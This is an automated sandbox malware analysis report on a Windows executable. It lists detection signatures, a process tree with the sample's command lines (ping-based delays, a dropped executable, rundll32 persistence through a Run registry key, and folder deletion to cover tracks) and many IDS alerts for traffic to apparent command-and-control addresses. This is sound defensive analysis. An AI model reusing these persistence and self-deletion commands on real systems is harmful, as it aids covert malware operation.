Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XgijTrY6No.exe

Overview

General Information

Sample name:XgijTrY6No.exe
renamed because original name is a hash value
Original sample name:02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced.exe
Analysis ID:1573195
MD5:fc2914434d6121f5e04e8e70e235c239
SHA1:2cb4237f4c0db11c3b6d80b54c9148daeccfeed6
SHA256:02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced
Tags:104-21-50-174exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Creates an autostart registry key pointing to binary in C:\Windows
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XgijTrY6No.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\XgijTrY6No.exe" MD5: FC2914434D6121F5E04E8E70E235C239)
    • cmd.exe (PID: 7428 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7480 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • mszcy.exe (PID: 7540 cmdline: C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe" MD5: 847CCE07E3BF3D974D1D089F5028E95F)
        • rundll32.exe (PID: 7556 cmdline: c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 7992 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 8020 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 8068 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 6956 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 7324 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6412 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\SysWOW64\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7556, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvtMgr

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-11T16:23:56.791299+010028032742Potentially Bad Traffic192.168.2.949784202.108.0.5280TCP
2024-12-11T16:23:59.829136+010028032742Potentially Bad Traffic192.168.2.949816202.108.0.5280TCP
2024-12-11T16:24:03.868947+010028032742Potentially Bad Traffic192.168.2.949859202.108.0.5280TCP
2024-12-11T16:24:08.003779+010028032742Potentially Bad Traffic192.168.2.949906202.108.0.5280TCP
2024-12-11T16:24:12.056552+010028032742Potentially Bad Traffic192.168.2.949954202.108.0.5280TCP
2024-12-11T16:24:16.057989+010028032742Potentially Bad Traffic192.168.2.950003202.108.0.5280TCP
2024-12-11T16:24:20.017510+010028032742Potentially Bad Traffic192.168.2.950051202.108.0.5280TCP
2024-12-11T16:24:24.055802+010028032742Potentially Bad Traffic192.168.2.950103202.108.0.5280TCP
2024-12-11T16:24:28.046919+010028032742Potentially Bad Traffic192.168.2.950153202.108.0.5280TCP
2024-12-11T16:24:32.061847+010028032742Potentially Bad Traffic192.168.2.950203202.108.0.5280TCP
2024-12-11T16:24:36.063719+010028032742Potentially Bad Traffic192.168.2.950258202.108.0.5280TCP
2024-12-11T16:24:42.283196+010028032742Potentially Bad Traffic192.168.2.950320202.108.0.5280TCP
2024-12-11T16:24:44.655236+010028032742Potentially Bad Traffic192.168.2.950386202.108.0.5280TCP
2024-12-11T16:24:48.144847+010028032742Potentially Bad Traffic192.168.2.950451202.108.0.5280TCP
2024-12-11T16:24:52.271421+010028032742Potentially Bad Traffic192.168.2.950520202.108.0.5280TCP
2024-12-11T16:24:56.292372+010028032742Potentially Bad Traffic192.168.2.950615202.108.0.5280TCP
2024-12-11T16:25:00.327134+010028032742Potentially Bad Traffic192.168.2.950731202.108.0.5280TCP
2024-12-11T16:25:04.663212+010028032742Potentially Bad Traffic192.168.2.950862202.108.0.5280TCP
2024-12-11T16:25:08.789547+010028032742Potentially Bad Traffic192.168.2.951060202.108.0.5280TCP
2024-12-11T16:25:12.778422+010028032742Potentially Bad Traffic192.168.2.951280202.108.0.5280TCP
2024-12-11T16:25:16.915501+010028032742Potentially Bad Traffic192.168.2.951528202.108.0.5280TCP
2024-12-11T16:25:20.919423+010028032742Potentially Bad Traffic192.168.2.951755202.108.0.5280TCP
2024-12-11T16:25:25.009831+010028032742Potentially Bad Traffic192.168.2.953200202.108.0.5280TCP
2024-12-11T16:25:28.958074+010028032742Potentially Bad Traffic192.168.2.956944202.108.0.5280TCP
2024-12-11T16:25:32.986227+010028032742Potentially Bad Traffic192.168.2.960100202.108.0.5280TCP
2024-12-11T16:25:36.966819+010028032742Potentially Bad Traffic192.168.2.963952202.108.0.5280TCP
2024-12-11T16:25:39.174337+010028032742Potentially Bad Traffic192.168.2.950337202.108.0.5280TCP
2024-12-11T16:25:40.982007+010028032742Potentially Bad Traffic192.168.2.950977202.108.0.5280TCP
2024-12-11T16:25:43.390201+010028032742Potentially Bad Traffic192.168.2.953380202.108.0.5280TCP
2024-12-11T16:25:45.263834+010028032742Potentially Bad Traffic192.168.2.953422202.108.0.5280TCP
2024-12-11T16:25:47.489539+010028032742Potentially Bad Traffic192.168.2.955962202.108.0.5280TCP
2024-12-11T16:25:49.296299+010028032742Potentially Bad Traffic192.168.2.956327202.108.0.5280TCP
2024-12-11T16:25:51.501893+010028032742Potentially Bad Traffic192.168.2.958828202.108.0.5280TCP
2024-12-11T16:25:53.311911+010028032742Potentially Bad Traffic192.168.2.959066202.108.0.5280TCP
2024-12-11T16:25:57.315350+010028032742Potentially Bad Traffic192.168.2.962750202.108.0.5280TCP
2024-12-11T16:25:59.533787+010028032742Potentially Bad Traffic192.168.2.949590202.108.0.5280TCP
2024-12-11T16:26:01.342570+010028032742Potentially Bad Traffic192.168.2.949927202.108.0.5280TCP
2024-12-11T16:26:05.328584+010028032742Potentially Bad Traffic192.168.2.952124202.108.0.5280TCP
2024-12-11T16:26:07.564951+010028032742Potentially Bad Traffic192.168.2.956006202.108.0.5280TCP
2024-12-11T16:26:09.404639+010028032742Potentially Bad Traffic192.168.2.956383202.108.0.5280TCP
2024-12-11T16:26:11.581670+010028032742Potentially Bad Traffic192.168.2.958881202.108.0.5280TCP
2024-12-11T16:26:13.392656+010028032742Potentially Bad Traffic192.168.2.959214202.108.0.5280TCP
2024-12-11T16:26:17.516942+010028032742Potentially Bad Traffic192.168.2.961877202.108.0.5280TCP
2024-12-11T16:26:19.721041+010028032742Potentially Bad Traffic192.168.2.965375202.108.0.5280TCP
2024-12-11T16:26:21.523696+010028032742Potentially Bad Traffic192.168.2.949288202.108.0.5280TCP
2024-12-11T16:26:23.736160+010028032742Potentially Bad Traffic192.168.2.952401202.108.0.5280TCP
2024-12-11T16:26:25.525697+010028032742Potentially Bad Traffic192.168.2.952941202.108.0.5280TCP
2024-12-11T16:26:27.751723+010028032742Potentially Bad Traffic192.168.2.955715202.108.0.5280TCP
2024-12-11T16:26:29.551664+010028032742Potentially Bad Traffic192.168.2.956267202.108.0.5280TCP
2024-12-11T16:26:33.766154+010028032742Potentially Bad Traffic192.168.2.959063202.108.0.5280TCP
2024-12-11T16:26:36.004804+010028032742Potentially Bad Traffic192.168.2.961971202.108.0.5280TCP
2024-12-11T16:26:37.846600+010028032742Potentially Bad Traffic192.168.2.962491202.108.0.5280TCP
2024-12-11T16:26:40.017466+010028032742Potentially Bad Traffic192.168.2.949463202.108.0.5280TCP
2024-12-11T16:26:41.926799+010028032742Potentially Bad Traffic192.168.2.950046202.108.0.5280TCP
2024-12-11T16:26:45.850702+010028032742Potentially Bad Traffic192.168.2.952122202.108.0.5280TCP
2024-12-11T16:26:48.072805+010028032742Potentially Bad Traffic192.168.2.955883202.108.0.5280TCP
2024-12-11T16:26:49.940750+010028032742Potentially Bad Traffic192.168.2.956240202.108.0.5280TCP
2024-12-11T16:26:52.127621+010028032742Potentially Bad Traffic192.168.2.960302202.108.0.5280TCP
2024-12-11T16:26:53.948394+010028032742Potentially Bad Traffic192.168.2.960812202.108.0.5280TCP
2024-12-11T16:26:56.253311+010028032742Potentially Bad Traffic192.168.2.963950202.108.0.5280TCP
2024-12-11T16:26:58.059484+010028032742Potentially Bad Traffic192.168.2.964412202.108.0.5280TCP
2024-12-11T16:27:00.267470+010028032742Potentially Bad Traffic192.168.2.951307202.108.0.5280TCP
2024-12-11T16:27:02.176197+010028032742Potentially Bad Traffic192.168.2.951783202.108.0.5280TCP
2024-12-11T16:27:06.223009+010028032742Potentially Bad Traffic192.168.2.954437202.108.0.5280TCP
2024-12-11T16:27:10.184978+010028032742Potentially Bad Traffic192.168.2.957643202.108.0.5280TCP
2024-12-11T16:27:12.315483+010028032742Potentially Bad Traffic192.168.2.961632202.108.0.5280TCP
2024-12-11T16:27:14.124924+010028032742Potentially Bad Traffic192.168.2.962079202.108.0.5280TCP
2024-12-11T16:27:16.330903+010028032742Potentially Bad Traffic192.168.2.965252202.108.0.5280TCP
2024-12-11T16:27:18.135329+010028032742Potentially Bad Traffic192.168.2.965492202.108.0.5280TCP
2024-12-11T16:27:20.345986+010028032742Potentially Bad Traffic192.168.2.952282202.108.0.5280TCP
2024-12-11T16:27:22.167088+010028032742Potentially Bad Traffic192.168.2.952772202.108.0.5280TCP
2024-12-11T16:27:24.470681+010028032742Potentially Bad Traffic192.168.2.956259202.108.0.5280TCP
2024-12-11T16:27:26.271896+010028032742Potentially Bad Traffic192.168.2.956922202.108.0.5280TCP
2024-12-11T16:27:28.486033+010028032742Potentially Bad Traffic192.168.2.959719202.108.0.5280TCP
2024-12-11T16:27:30.472520+010028032742Potentially Bad Traffic192.168.2.960345202.108.0.5280TCP
2024-12-11T16:27:32.502287+010028032742Potentially Bad Traffic192.168.2.963289202.108.0.5280TCP
2024-12-11T16:27:34.301864+010028032742Potentially Bad Traffic192.168.2.963531202.108.0.5280TCP
2024-12-11T16:27:36.517660+010028032742Potentially Bad Traffic192.168.2.949981202.108.0.5280TCP
2024-12-11T16:27:38.320425+010028032742Potentially Bad Traffic192.168.2.950465202.108.0.5280TCP
2024-12-11T16:27:40.533102+010028032742Potentially Bad Traffic192.168.2.953313202.108.0.5280TCP
2024-12-11T16:27:42.344355+010028032742Potentially Bad Traffic192.168.2.953774202.108.0.5280TCP
2024-12-11T16:27:44.569071+010028032742Potentially Bad Traffic192.168.2.957093202.108.0.5280TCP
2024-12-11T16:27:46.407219+010028032742Potentially Bad Traffic192.168.2.957498202.108.0.5280TCP
2024-12-11T16:27:48.707734+010028032742Potentially Bad Traffic192.168.2.959199202.108.0.5280TCP
2024-12-11T16:27:50.508515+010028032742Potentially Bad Traffic192.168.2.959535202.108.0.5280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-11T16:23:53.890560+010028032702Potentially Bad Traffic192.168.2.949751107.163.241.20412354TCP
2024-12-11T16:23:53.890593+010028032702Potentially Bad Traffic192.168.2.949750107.163.241.20412354TCP
2024-12-11T16:23:56.303416+010028032702Potentially Bad Traffic192.168.2.949772107.163.241.20412354TCP
2024-12-11T16:23:56.303417+010028032702Potentially Bad Traffic192.168.2.949773107.163.241.20412354TCP
2024-12-11T16:23:58.018318+010028032702Potentially Bad Traffic192.168.2.949796107.163.241.20412354TCP
2024-12-11T16:23:58.018413+010028032702Potentially Bad Traffic192.168.2.949798107.163.241.20412354TCP
2024-12-11T16:24:00.253086+010028032702Potentially Bad Traffic192.168.2.949814107.163.241.20412354TCP
2024-12-11T16:24:00.382672+010028032702Potentially Bad Traffic192.168.2.949815107.163.241.20412354TCP
2024-12-11T16:24:02.018923+010028032702Potentially Bad Traffic192.168.2.949842107.163.241.20412354TCP
2024-12-11T16:24:02.018923+010028032702Potentially Bad Traffic192.168.2.949840107.163.241.20412354TCP
2024-12-11T16:24:04.284200+010028032702Potentially Bad Traffic192.168.2.949857107.163.241.20412354TCP
2024-12-11T16:24:04.422135+010028032702Potentially Bad Traffic192.168.2.949860107.163.241.20412354TCP
2024-12-11T16:24:06.030356+010028032702Potentially Bad Traffic192.168.2.949884107.163.241.20412354TCP
2024-12-11T16:24:06.030511+010028032702Potentially Bad Traffic192.168.2.949887107.163.241.20412354TCP
2024-12-11T16:24:08.265325+010028032702Potentially Bad Traffic192.168.2.949903107.163.241.20412354TCP
2024-12-11T16:24:08.390411+010028032702Potentially Bad Traffic192.168.2.949905107.163.241.20412354TCP
2024-12-11T16:24:10.158882+010028032702Potentially Bad Traffic192.168.2.949932107.163.241.20412354TCP
2024-12-11T16:24:10.158902+010028032702Potentially Bad Traffic192.168.2.949929107.163.241.20412354TCP
2024-12-11T16:24:12.390865+010028032702Potentially Bad Traffic192.168.2.949952107.163.241.20412354TCP
2024-12-11T16:24:12.624896+010028032702Potentially Bad Traffic192.168.2.949955107.163.241.20412354TCP
2024-12-11T16:24:14.176674+010028032702Potentially Bad Traffic192.168.2.949983107.163.241.20412354TCP
2024-12-11T16:24:14.176738+010028032702Potentially Bad Traffic192.168.2.949979107.163.241.20412354TCP
2024-12-11T16:24:16.422328+010028032702Potentially Bad Traffic192.168.2.950000107.163.241.20412354TCP
2024-12-11T16:24:16.657593+010028032702Potentially Bad Traffic192.168.2.950002107.163.241.20412354TCP
2024-12-11T16:24:18.190233+010028032702Potentially Bad Traffic192.168.2.950028107.163.241.20412354TCP
2024-12-11T16:24:18.190278+010028032702Potentially Bad Traffic192.168.2.950032107.163.241.20412354TCP
2024-12-11T16:24:20.459981+010028032702Potentially Bad Traffic192.168.2.950048107.163.241.20412354TCP
2024-12-11T16:24:20.547172+010028032702Potentially Bad Traffic192.168.2.950050107.163.241.20412354TCP
2024-12-11T16:24:22.233432+010028032702Potentially Bad Traffic192.168.2.950080107.163.241.20412354TCP
2024-12-11T16:24:22.233453+010028032702Potentially Bad Traffic192.168.2.950077107.163.241.20412354TCP
2024-12-11T16:24:24.482620+010028032702Potentially Bad Traffic192.168.2.950100107.163.241.20412354TCP
2024-12-11T16:24:24.594050+010028032702Potentially Bad Traffic192.168.2.950102107.163.241.20412354TCP
2024-12-11T16:24:26.236605+010028032702Potentially Bad Traffic192.168.2.950130107.163.241.20412354TCP
2024-12-11T16:24:26.236679+010028032702Potentially Bad Traffic192.168.2.950127107.163.241.20412354TCP
2024-12-11T16:24:28.529616+010028032702Potentially Bad Traffic192.168.2.950150107.163.241.20412354TCP
2024-12-11T16:24:28.649777+010028032702Potentially Bad Traffic192.168.2.950152107.163.241.20412354TCP
2024-12-11T16:24:30.251968+010028032702Potentially Bad Traffic192.168.2.950177107.163.241.20412354TCP
2024-12-11T16:24:30.252001+010028032702Potentially Bad Traffic192.168.2.950180107.163.241.20412354TCP
2024-12-11T16:24:32.484735+010028032702Potentially Bad Traffic192.168.2.950200107.163.241.20412354TCP
2024-12-11T16:24:32.610317+010028032702Potentially Bad Traffic192.168.2.950204107.163.241.20412354TCP
2024-12-11T16:24:34.260322+010028032702Potentially Bad Traffic192.168.2.950236107.163.241.20412354TCP
2024-12-11T16:24:34.260451+010028032702Potentially Bad Traffic192.168.2.950233107.163.241.20412354TCP
2024-12-11T16:24:36.482958+010028032702Potentially Bad Traffic192.168.2.950255107.163.241.20412354TCP
2024-12-11T16:24:36.603552+010028032702Potentially Bad Traffic192.168.2.950257107.163.241.20412354TCP
2024-12-11T16:24:38.268096+010028032702Potentially Bad Traffic192.168.2.950289107.163.241.20412354TCP
2024-12-11T16:24:38.268130+010028032702Potentially Bad Traffic192.168.2.950292107.163.241.20412354TCP
2024-12-11T16:24:40.515932+010028032702Potentially Bad Traffic192.168.2.950317107.163.241.20412354TCP
2024-12-11T16:24:40.623860+010028032702Potentially Bad Traffic192.168.2.950319107.163.241.20412354TCP
2024-12-11T16:24:42.283052+010028032702Potentially Bad Traffic192.168.2.950356107.163.241.20412354TCP
2024-12-11T16:24:42.283199+010028032702Potentially Bad Traffic192.168.2.950354107.163.241.20412354TCP
2024-12-11T16:24:44.516425+010028032702Potentially Bad Traffic192.168.2.950382107.163.241.20412354TCP
2024-12-11T16:24:44.640596+010028032702Potentially Bad Traffic192.168.2.950385107.163.241.20412354TCP
2024-12-11T16:24:46.307062+010028032702Potentially Bad Traffic192.168.2.950414107.163.241.20412354TCP
2024-12-11T16:24:46.307144+010028032702Potentially Bad Traffic192.168.2.950416107.163.241.20412354TCP
2024-12-11T16:24:48.533080+010028032702Potentially Bad Traffic192.168.2.950446107.163.241.20412354TCP
2024-12-11T16:24:48.691211+010028032702Potentially Bad Traffic192.168.2.950450107.163.241.20412354TCP
2024-12-11T16:24:50.455795+010028032702Potentially Bad Traffic192.168.2.950487107.163.241.20412354TCP
2024-12-11T16:24:50.455806+010028032702Potentially Bad Traffic192.168.2.950483107.163.241.20412354TCP
2024-12-11T16:24:52.688069+010028032702Potentially Bad Traffic192.168.2.950517107.163.241.20412354TCP
2024-12-11T16:24:52.812873+010028032702Potentially Bad Traffic192.168.2.950521107.163.241.20412354TCP
2024-12-11T16:24:54.470959+010028032702Potentially Bad Traffic192.168.2.950571107.163.241.20412354TCP
2024-12-11T16:24:54.471060+010028032702Potentially Bad Traffic192.168.2.950574107.163.241.20412354TCP
2024-12-11T16:24:56.785363+010028032702Potentially Bad Traffic192.168.2.950610107.163.241.20412354TCP
2024-12-11T16:24:56.829068+010028032702Potentially Bad Traffic192.168.2.950614107.163.241.20412354TCP
2024-12-11T16:24:58.489654+010028032702Potentially Bad Traffic192.168.2.950681107.163.241.20412354TCP
2024-12-11T16:24:58.489687+010028032702Potentially Bad Traffic192.168.2.950675107.163.241.20412354TCP
2024-12-11T16:25:00.857922+010028032702Potentially Bad Traffic192.168.2.950726107.163.241.20412354TCP
2024-12-11T16:25:00.876287+010028032702Potentially Bad Traffic192.168.2.950730107.163.241.20412354TCP
2024-12-11T16:25:02.673947+010028032702Potentially Bad Traffic192.168.2.950810107.163.241.20412354TCP
2024-12-11T16:25:02.673978+010028032702Potentially Bad Traffic192.168.2.950804107.163.241.20412354TCP
2024-12-11T16:25:05.064847+010028032702Potentially Bad Traffic192.168.2.950858107.163.241.20412354TCP
2024-12-11T16:25:05.186377+010028032702Potentially Bad Traffic192.168.2.950861107.163.241.20412354TCP
2024-12-11T16:25:06.955156+010028032702Potentially Bad Traffic192.168.2.950959107.163.241.20412354TCP
2024-12-11T16:25:06.955323+010028032702Potentially Bad Traffic192.168.2.950969107.163.241.20412354TCP
2024-12-11T16:25:09.188278+010028032702Potentially Bad Traffic192.168.2.951054107.163.241.20412354TCP
2024-12-11T16:25:09.298687+010028032702Potentially Bad Traffic192.168.2.951059107.163.241.20412354TCP
2024-12-11T16:25:10.955064+010028032702Potentially Bad Traffic192.168.2.951174107.163.241.20412354TCP
2024-12-11T16:25:10.955087+010028032702Potentially Bad Traffic192.168.2.951165107.163.241.20412354TCP
2024-12-11T16:25:13.188982+010028032702Potentially Bad Traffic192.168.2.951270107.163.241.20412354TCP
2024-12-11T16:25:13.424881+010028032702Potentially Bad Traffic192.168.2.951281107.163.241.20412354TCP
2024-12-11T16:25:15.095798+010028032702Potentially Bad Traffic192.168.2.951398107.163.241.20412354TCP
2024-12-11T16:25:15.095859+010028032702Potentially Bad Traffic192.168.2.951413107.163.241.20412354TCP
2024-12-11T16:25:17.345616+010028032702Potentially Bad Traffic192.168.2.951518107.163.241.20412354TCP
2024-12-11T16:25:17.438537+010028032702Potentially Bad Traffic192.168.2.951526107.163.241.20412354TCP
2024-12-11T16:25:19.111413+010028032702Potentially Bad Traffic192.168.2.951656107.163.241.20412354TCP
2024-12-11T16:25:19.111431+010028032702Potentially Bad Traffic192.168.2.951647107.163.241.20412354TCP
2024-12-11T16:25:21.344835+010028032702Potentially Bad Traffic192.168.2.951746107.163.241.20412354TCP
2024-12-11T16:25:21.459218+010028032702Potentially Bad Traffic192.168.2.951754107.163.241.20412354TCP
2024-12-11T16:25:23.130264+010028032702Potentially Bad Traffic192.168.2.951895107.163.241.20412354TCP
2024-12-11T16:25:23.130347+010028032702Potentially Bad Traffic192.168.2.951887107.163.241.20412354TCP
2024-12-11T16:25:25.398283+010028032702Potentially Bad Traffic192.168.2.953096107.163.241.20412354TCP
2024-12-11T16:25:25.488125+010028032702Potentially Bad Traffic192.168.2.953196107.163.241.20412354TCP
2024-12-11T16:25:27.142945+010028032702Potentially Bad Traffic192.168.2.955373107.163.241.20412354TCP
2024-12-11T16:25:27.143418+010028032702Potentially Bad Traffic192.168.2.955196107.163.241.20412354TCP
2024-12-11T16:25:29.394582+010028032702Potentially Bad Traffic192.168.2.956825107.163.241.20412354TCP
2024-12-11T16:25:29.502142+010028032702Potentially Bad Traffic192.168.2.956943107.163.241.20412354TCP
2024-12-11T16:25:31.158000+010028032702Potentially Bad Traffic192.168.2.958262107.163.241.20412354TCP
2024-12-11T16:25:31.158120+010028032702Potentially Bad Traffic192.168.2.958391107.163.241.20412354TCP
2024-12-11T16:25:33.409008+010028032702Potentially Bad Traffic192.168.2.959886107.163.241.20412354TCP
2024-12-11T16:25:33.582161+010028032702Potentially Bad Traffic192.168.2.960187107.163.241.20412354TCP
2024-12-11T16:25:35.161257+010028032702Potentially Bad Traffic192.168.2.962140107.163.241.20412354TCP
2024-12-11T16:25:35.161334+010028032702Potentially Bad Traffic192.168.2.962324107.163.241.20412354TCP
2024-12-11T16:25:37.393782+010028032702Potentially Bad Traffic192.168.2.963850107.163.241.20412354TCP
2024-12-11T16:25:37.527730+010028032702Potentially Bad Traffic192.168.2.963953107.163.241.20412354TCP
2024-12-11T16:25:39.174379+010028032702Potentially Bad Traffic192.168.2.949568107.163.241.20412354TCP
2024-12-11T16:25:39.174382+010028032702Potentially Bad Traffic192.168.2.949408107.163.241.20412354TCP
2024-12-11T16:25:41.422540+010028032702Potentially Bad Traffic192.168.2.950887107.163.241.20412354TCP
2024-12-11T16:25:41.516828+010028032702Potentially Bad Traffic192.168.2.950978107.163.241.20412354TCP
2024-12-11T16:25:43.390315+010028032702Potentially Bad Traffic192.168.2.952262107.163.241.20412354TCP
2024-12-11T16:25:43.390350+010028032702Potentially Bad Traffic192.168.2.952324107.163.241.20412354TCP
2024-12-11T16:25:45.704668+010028032702Potentially Bad Traffic192.168.2.953384107.163.241.20412354TCP
2024-12-11T16:25:45.820890+010028032702Potentially Bad Traffic192.168.2.953421107.163.241.20412354TCP
2024-12-11T16:25:47.489520+010028032702Potentially Bad Traffic192.168.2.955526107.163.241.20412354TCP
2024-12-11T16:25:47.489568+010028032702Potentially Bad Traffic192.168.2.955505107.163.241.20412354TCP
2024-12-11T16:25:49.735788+010028032702Potentially Bad Traffic192.168.2.956247107.163.241.20412354TCP
2024-12-11T16:25:49.845073+010028032702Potentially Bad Traffic192.168.2.956326107.163.241.20412354TCP
2024-12-11T16:25:51.501863+010028032702Potentially Bad Traffic192.168.2.958061107.163.241.20412354TCP
2024-12-11T16:25:51.501922+010028032702Potentially Bad Traffic192.168.2.957951107.163.241.20412354TCP
2024-12-11T16:25:53.740745+010028032702Potentially Bad Traffic192.168.2.958996107.163.241.20412354TCP
2024-12-11T16:25:53.848769+010028032702Potentially Bad Traffic192.168.2.959064107.163.241.20412354TCP
2024-12-11T16:25:55.520324+010028032702Potentially Bad Traffic192.168.2.960767107.163.241.20412354TCP
2024-12-11T16:25:55.520327+010028032702Potentially Bad Traffic192.168.2.960826107.163.241.20412354TCP
2024-12-11T16:25:57.751798+010028032702Potentially Bad Traffic192.168.2.962599107.163.241.20412354TCP
2024-12-11T16:25:57.861170+010028032702Potentially Bad Traffic192.168.2.962749107.163.241.20412354TCP
2024-12-11T16:25:59.533787+010028032702Potentially Bad Traffic192.168.2.964837107.163.241.20412354TCP
2024-12-11T16:25:59.533794+010028032702Potentially Bad Traffic192.168.2.964938107.163.241.20412354TCP
2024-12-11T16:26:01.783128+010028032702Potentially Bad Traffic192.168.2.949903107.163.241.20412354TCP
2024-12-11T16:26:01.892106+010028032702Potentially Bad Traffic192.168.2.949928107.163.241.20412354TCP
2024-12-11T16:26:03.552117+010028032702Potentially Bad Traffic192.168.2.950952107.163.241.20412354TCP
2024-12-11T16:26:03.552519+010028032702Potentially Bad Traffic192.168.2.950770107.163.241.20412354TCP
2024-12-11T16:26:05.782889+010028032702Potentially Bad Traffic192.168.2.952076107.163.241.20412354TCP
2024-12-11T16:26:05.892252+010028032702Potentially Bad Traffic192.168.2.952148107.163.241.20412354TCP
2024-12-11T16:26:07.564993+010028032702Potentially Bad Traffic192.168.2.954341107.163.241.20412354TCP
2024-12-11T16:26:07.564997+010028032702Potentially Bad Traffic192.168.2.954178107.163.241.20412354TCP
2024-12-11T16:26:09.815489+010028032702Potentially Bad Traffic192.168.2.956340107.163.241.20412354TCP
2024-12-11T16:26:09.944582+010028032702Potentially Bad Traffic192.168.2.956384107.163.241.20412354TCP
2024-12-11T16:26:11.581694+010028032702Potentially Bad Traffic192.168.2.958350107.163.241.20412354TCP
2024-12-11T16:26:11.581720+010028032702Potentially Bad Traffic192.168.2.958345107.163.241.20412354TCP
2024-12-11T16:26:13.814424+010028032702Potentially Bad Traffic192.168.2.959128107.163.241.20412354TCP
2024-12-11T16:26:13.922594+010028032702Potentially Bad Traffic192.168.2.959213107.163.241.20412354TCP
2024-12-11T16:26:15.714568+010028032702Potentially Bad Traffic192.168.2.960550107.163.241.20412354TCP
2024-12-11T16:26:15.714727+010028032702Potentially Bad Traffic192.168.2.960645107.163.241.20412354TCP
2024-12-11T16:26:17.954784+010028032702Potentially Bad Traffic192.168.2.961837107.163.241.20412354TCP
2024-12-11T16:26:18.175392+010028032702Potentially Bad Traffic192.168.2.961878107.163.241.20412354TCP
2024-12-11T16:26:19.721076+010028032702Potentially Bad Traffic192.168.2.963928107.163.241.20412354TCP
2024-12-11T16:26:19.721104+010028032702Potentially Bad Traffic192.168.2.963820107.163.241.20412354TCP
2024-12-11T16:26:21.956590+010028032702Potentially Bad Traffic192.168.2.949227107.163.241.20412354TCP
2024-12-11T16:26:22.064152+010028032702Potentially Bad Traffic192.168.2.949286107.163.241.20412354TCP
